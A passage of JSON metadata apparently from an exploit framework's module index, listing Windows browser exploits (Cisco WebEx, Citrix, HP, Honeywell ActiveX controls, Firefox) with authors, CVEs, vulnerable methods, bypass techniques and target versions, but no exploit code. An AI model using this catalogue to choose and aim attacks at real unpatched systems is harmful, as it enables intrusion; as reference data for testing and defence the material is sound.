"Tavis Ormandy <taviso@google.com>",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits a vulnerability present in the Cisco WebEx Chrome Extension\n version 1.0.1 which allows an attacker to execute arbitrary commands on a system.",
"references": [
"CVE-2017-3823"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cisco WebEx Extension 1.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/cisco_webex_ext.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_webex_ext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/citrix_gateway_actx": {
"name": "Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability",
"full_name": "exploit/windows/browser/citrix_gateway_actx",
"rank": 300,
"disclosure_date": "2011-07-14",
"type": "exploit",
"author": [
"Michal Trojnara",
"bannedit <bannedit@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the Citrix Gateway\n ActiveX control. Exploitation of this vulnerability requires user interaction.\n The victim must click a button in a dialog to begin a scan. This is typical\n interaction that users should be accustom to.\n\n Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.",
"references": [
"CVE-2011-2882",
"OSVDB-74191",
"URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=929"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/citrix_gateway_actx.rb",
"is_install_path": true,
"ref_name": "windows/browser/citrix_gateway_actx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/clear_quest_cqole": {
"name": "IBM Rational ClearQuest CQOle Remote Code Execution",
"full_name": "exploit/windows/browser/clear_quest_cqole",
"rank": 300,
"disclosure_date": "2012-05-19",
"type": "exploit",
"author": [
"Andrea Micalizzi aka rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a function prototype mismatch on the CQOle ActiveX\n control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which\n allows reliable remote code execution when DEP isn't enabled.",
"references": [
"CVE-2012-0708",
"BID-53170",
"OSVDB-81443",
"ZDI-12-113",
"URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 / IE7 (No DEP)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/clear_quest_cqole.rb",
"is_install_path": true,
"ref_name": "windows/browser/clear_quest_cqole",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/communicrypt_mail_activex": {
"name": "CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow",
"full_name": "exploit/windows/browser/communicrypt_mail_activex",
"rank": 500,
"disclosure_date": "2010-05-19",
"type": "exploit",
"author": [
"Lincoln",
"dookie"
],
"description": "This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll\n ActiveX Control provided by CommuniCrypt Mail 1.16. By sending an overly\n long string to the \"AddAttachments()\" method, an attacker may be able to\n execute arbitrary code.",
"references": [
"OSVDB-64839",
"EDB-12663"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/communicrypt_mail_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/communicrypt_mail_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/creative_software_cachefolder": {
"name": "Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/creative_software_cachefolder",
"rank": 300,
"disclosure_date": "2008-05-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When\n sending an overly long string to the cachefolder() property of CTSUEng.ocx\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0955",
"OSVDB-45655"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/creative_software_cachefolder.rb",
"is_install_path": true,
"ref_name": "windows/browser/creative_software_cachefolder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/crystal_reports_printcontrol": {
"name": "Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",
"full_name": "exploit/windows/browser/crystal_reports_printcontrol",
"rank": 300,
"disclosure_date": "2010-12-14",
"type": "exploit",
"author": [
"Dmitriy Pletnev",
"Dr_IDE",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap based buffer overflow in the CrystalPrintControl\n ActiveX, while handling the ServerResourceVersion property. The affected control\n can be found in the PrintControl.dll component as included with Crystal Reports\n 2008. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3\n and IE 8 on Windows 7 SP1. The module uses the msvcr71.dll library, loaded by the\n affected ActiveX control, to bypass DEP and ASLR.",
"references": [
"CVE-2010-2590",
"OSVDB-69917",
"BID-45387",
"EDB-15733"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/crystal_reports_printcontrol.rb",
"is_install_path": true,
"ref_name": "windows/browser/crystal_reports_printcontrol",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/dell_webcam_crazytalk": {
"name": "Dell Webcam CrazyTalk ActiveX BackImage Vulnerability",
"full_name": "exploit/windows/browser/dell_webcam_crazytalk",
"rank": 300,
"disclosure_date": "2012-03-19",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Dell Webcam's CrazyTalk component.\n Specifically, when supplying a long string for a file path to the BackImage\n property, an overflow may occur after checking certain file extension names,\n resulting in remote code execution under the context of the user.",
"references": [
"URL-http://www.dell.com/support/drivers/us/en/04/DriverDetails/DriverFileFormats?c=us&l=en&s=bsd&cs=04&DriverId=R230103",
"EDB-18621",
"OSVDB-80205"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/dell_webcam_crazytalk.rb",
"is_install_path": true,
"ref_name": "windows/browser/dell_webcam_crazytalk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/dxstudio_player_exec": {
"name": "Worldweaver DX Studio Player shell.execute() Command Execution",
"full_name": "exploit/windows/browser/dxstudio_player_exec",
"rank": 600,
"disclosure_date": "2009-06-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command execution vulnerability within the DX\n Studio Player from Worldweaver for versions 3.0.29 and earlier. The\n player is a browser plugin for IE (ActiveX) and Firefox (dll). When an\n unsuspecting user visits a web page referring to a specially crafted\n .dxstudio document, an attacker can execute arbitrary commands.\n\n Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20\n and IE 6 on Windows XP SP3. In IE, the user will be prompted if they\n wish to allow the plug-in to access local files. This prompt appears to\n occur only once per server host.\n\n NOTE: This exploit uses additionally dangerous script features to write\n to local files!",
"references": [
"CVE-2009-2011",
"BID-35273",
"OSVDB-54969",
"EDB-8922",
"URL-http://dxstudio.com/guide.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/dxstudio_player_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/dxstudio_player_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ea_checkrequirements": {
"name": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ea_checkrequirements",
"rank": 300,
"disclosure_date": "2007-10-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\n ActiveX Control (NPSnpy.dll 1.1.0.36. When sending an overly long\n string to the CheckRequirements() method, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2007-4466",
"OSVDB-37723"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ea_checkrequirements.rb",
"is_install_path": true,
"ref_name": "windows/browser/ea_checkrequirements",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ebook_flipviewer_fviewerloading": {
"name": "FlipViewer FViewerLoading ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ebook_flipviewer_fviewerloading",
"rank": 300,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>"
],
"description": "This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0.\n The vulnerability is caused due to a boundary error in the\n FViewerLoading (FlipViewerX.dll) ActiveX control when handling the\n \"LoadOpf()\" method.",
"references": [
"CVE-2007-2919",
"OSVDB-37042",
"BID-24328"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb",
"is_install_path": true,
"ref_name": "windows/browser/ebook_flipviewer_fviewerloading",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/enjoysapgui_comp_download": {
"name": "EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/enjoysapgui_comp_download",
"rank": 600,
"disclosure_date": "2009-04-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a users file system\n by abusing the \"Comp_Download\" method in the SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41).",
"references": [
"CVE-2008-4830",
"OSVDB-53680",
"URL-http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/enjoysapgui_comp_download.rb",
"is_install_path": true,
"ref_name": "windows/browser/enjoysapgui_comp_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/enjoysapgui_preparetoposthtml": {
"name": "EnjoySAP SAP GUI ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/enjoysapgui_preparetoposthtml",
"rank": 300,
"disclosure_date": "2007-07-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SAP KWEdit ActiveX\n Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending\n an overly long string to the \"PrepareToPostHTML()\" method, an attacker\n may be able to execute arbitrary code.",
"references": [
"CVE-2007-3605",
"OSVDB-37690",
"BID-24772"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP0/SP1 English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb",
"is_install_path": true,
"ref_name": "windows/browser/enjoysapgui_preparetoposthtml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/exodus": {
"name": "Exodus Wallet (ElectronJS Framework) remote Code Execution",
"full_name": "exploit/windows/browser/exodus",
"rank": 0,
"disclosure_date": "2018-01-25",
"type": "exploit",
"author": [
"Wflki",
"Daniel Teixeira"
],
"description": "This module exploits a Remote Code Execution vulnerability in Exodus Wallet,\n a vulnerability in the ElectronJS Framework protocol handler can be used to\n get arbitrary command execution if the user clicks on a specially crafted URL.",
"references": [
"EDB-43899",
"BID-102796",
"CVE-2018-1000006"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PSH (Binary)"
],
"mod_time": "2018-02-28 11:04:16 +0000",
"path": "/modules/exploits/windows/browser/exodus.rb",
"is_install_path": true,
"ref_name": "windows/browser/exodus",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/facebook_extractiptc": {
"name": "Facebook Photo Uploader 4 ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/facebook_extractiptc",
"rank": 300,
"disclosure_date": "2008-01-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Facebook Photo Uploader 4.\n By sending an overly long string to the \"ExtractIptc()\" property located\n in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-5711",
"OSVDB-41073",
"BID-27534",
"EDB-5049"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 6 SP0-SP2 / Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/facebook_extractiptc.rb",
"is_install_path": true,
"ref_name": "windows/browser/facebook_extractiptc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/firefox_smil_uaf": {
"name": "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
"full_name": "exploit/windows/browser/firefox_smil_uaf",
"rank": 300,
"disclosure_date": "2016-11-30",
"type": "exploit",
"author": [
"Anonymous Gaijin",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits an out-of-bounds indexing/use-after-free condition present in\n nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox\n on Microsoft Windows.",
"references": [
"CVE-2016-9079",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1321066",
"URL-https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mozilla Firefox 38 to 41"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/firefox_smil_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/firefox_smil_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/foxit_reader_plugin_url_bof": {
"name": "Foxit Reader Plugin URL Processing Buffer Overflow",
"full_name": "exploit/windows/browser/foxit_reader_plugin_url_bof",
"rank": 300,
"disclosure_date": "2013-01-07",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"Sven Krewitt <svnk@krewitt.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Foxit Reader Plugin, it exists in\n the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,\n overly long query strings within URLs can cause a stack-based buffer overflow,\n which can be exploited to execute arbitrary code. This exploit has been tested\n on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281\n (npFoxitReaderPlugin.dll version 2.2.1.530).",
"references": [
"OSVDB-89030",
"BID-57174",
"EDB-23944",
"URL-http://secunia.com/advisories/51733/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/foxit_reader_plugin_url_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/getgodm_http_response_bof": {
"name": "GetGo Download Manager HTTP Response Buffer Overflow",
"full_name": "exploit/windows/browser/getgodm_http_response_bof",
"rank": 300,
"disclosure_date": "2014-03-09",
"type": "exploit",
"author": [
"Julien Ahrens",
"Gabor Seljan",
"bzyo",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n GetGo Download Manager version 5.3.0.2712 earlier, caused by an\n overly long HTTP response header.\n\n By persuading the victim to download a file from a malicious server, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.",
"references": [
"EDB-32132",
"OSVDB-103910",
"CVE-2014-2206"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"4.9.0.1982 on Windows XP SP3",
"5.3.0.2712 on Windows XP SP3"
],
"mod_time": "2018-11-29 17:29:05 +0000",
"path": "/modules/exploits/windows/browser/getgodm_http_response_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/getgodm_http_response_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/gom_openurl": {
"name": "GOM Player ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/gom_openurl",
"rank": 300,
"disclosure_date": "2007-10-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in GOM Player 2.1.6.3499.\n By sending an overly long string to the \"OpenUrl()\" method located\n in the GomWeb3.dll Control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-5779",
"OSVDB-38282",
"URL-http://secunia.com/advisories/27418/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/gom_openurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/gom_openurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/greendam_url": {
"name": "Green Dam URL Processing Buffer Overflow",
"full_name": "exploit/windows/browser/greendam_url",
"rank": 300,
"disclosure_date": "2009-06-11",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in Green Dam Youth Escort\n version 3.17 in the way it handles overly long URLs.\n By setting an overly long URL, an attacker can overrun a buffer and execute\n arbitrary code. This module uses the .NET DLL memory technique by Alexander\n Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.",
"references": [
"OSVDB-55126",
"URL-http://www.cse.umich.edu/~jhalderm/pub/gd/",
"EDB-8938",
"URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/greendam_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/greendam_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/honeywell_hscremotedeploy_exec": {
"name": "Honeywell HSC Remote Deployer ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/honeywell_hscremotedeploy_exec",
"rank": 600,
"disclosure_date": "2013-02-22",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the Honeywell HSC Remote Deployer\n ActiveX. This control can be abused by using the LaunchInstaller() function to\n execute an arbitrary HTA from a remote location. This module has been tested\n successfully with the HSC Remote Deployer ActiveX installed with Honeywell EBI\n R410.1.",
"references": [
"CVE-2013-0108",
"OSVDB-90583",
"BID-58134",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi",
"URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/honeywell_hscremotedeploy_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/honeywell_tema_exec": {
"name": "Honeywell Tema Remote Installer ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/honeywell_tema_exec",
"rank": 600,
"disclosure_date": "2011-10-20",
"type": "exploit",
"author": [
"Billy Rios",
"Terry McCorkle",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the Honeywell Tema ActiveX Remote\n Installer. This ActiveX control can be abused by using the DownloadFromURL()\n function to install an arbitrary MSI from a remote location without checking source\n authenticity or user notification. This module has been tested successfully with\n the Remote Installer ActiveX installed with Honeywell EBI R410.1 - TEMA 5.3.0 and\n Internet Explorer 6, 7 and 8 on Windows XP SP3.",
"references": [
"OSVDB-76681",
"BID-50078",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/honeywell_tema_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/honeywell_tema_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_alm_xgo_setshapenodetype_exec": {
"name": "HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",
"full_name": "exploit/windows/browser/hp_alm_xgo_setshapenodetype_exec",
"rank": 300,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability within the XGO.ocx ActiveX Control\n installed with the HP Application Lifecycle Manager Client. The vulnerability\n exists in the SetShapeNodeType method, which allows the user to specify memory\n that will be used as an object, through the node parameter. It allows to control\n the dereference and use of a function pointer. This module has been successfully\n tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to\n bypass DEP and ASLR.",
"references": [
"OSVDB-85152",
"BID-55272",
"ZDI-12-170"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_alm_xgo_setshapenodetype_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_easy_printer_care_xmlcachemgr": {
"name": "HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",
"full_name": "exploit/windows/browser/hp_easy_printer_care_xmlcachemgr",
"rank": 500,
"disclosure_date": "2012-01-11",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a users file\n system by abusing the \"CacheDocumentXMLWithId\" method from the \"XMLCacheMgr\"\n class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll\n 2.7.2.0).\n\n Code execution can be achieved by first uploading the payload to the remote\n machine embeddeding a vbs file, and then upload another mof file, which enables\n Windows Management Instrumentation service to execute the vbs. Please note that\n this module currently only works for Windows before Vista.",
"references": [
"CVE-2011-4786",
"OSVDB-78306",
"BID-51396",
"ZDI-12-013"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_easy_printer_care_xmlcachemgr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_easy_printer_care_xmlsimpleaccessor": {
"name": "HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",
"full_name": "exploit/windows/browser/hp_easy_printer_care_xmlsimpleaccessor",
"rank": 500,
"disclosure_date": "2011-08-16",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a users file\n system by abusing via Directory Traversal attack the \"saveXML\" method from the\n \"XMLSimpleAccessor\" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control\n (HPTicketMgr.dll 2.7.2.0).\n\n Code execution can be achieved by first uploading the payload to the remote\n machine embeddeding a vbs file, and then upload another mof file, which enables Windows\n Management Instrumentation service to execute the vbs. Please note that this\n module currently only works for Windows before Vista.",
"references": [
"CVE-2011-2404",
"OSVDB-74510",
"BID-49100",
"ZDI-11-261"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_easy_printer_care_xmlsimpleaccessor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_addfile": {
"name": "Persits XUpload ActiveX AddFile Buffer Overflow",
"full_name": "exploit/windows/browser/hp_loadrunner_addfile",
"rank": 300,
"disclosure_date": "2008-01-25",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Persits Software Inc's\n XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5.\n By passing an overly long string to the AddFile method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2008-0492",
"OSVDB-40762",
"BID-27456",
"EDB-4987"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XUpload.ocx 3.0.0.3 on Windows XP SP3 / IE6 SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_addfile.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_addfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_addfolder": {
"name": "HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow",
"full_name": "exploit/windows/browser/hp_loadrunner_addfolder",
"rank": 400,
"disclosure_date": "2007-12-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Persits Software Inc's\n XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0.\n By passing an overly long string to the AddFolder method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2007-6530",
"OSVDB-39901",
"BID-27025"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English / IE6SP0-SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_addfolder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_writefilebinary": {
"name": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/hp_loadrunner_writefilebinary",
"rank": 300,
"disclosure_date": "2013-07-24",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
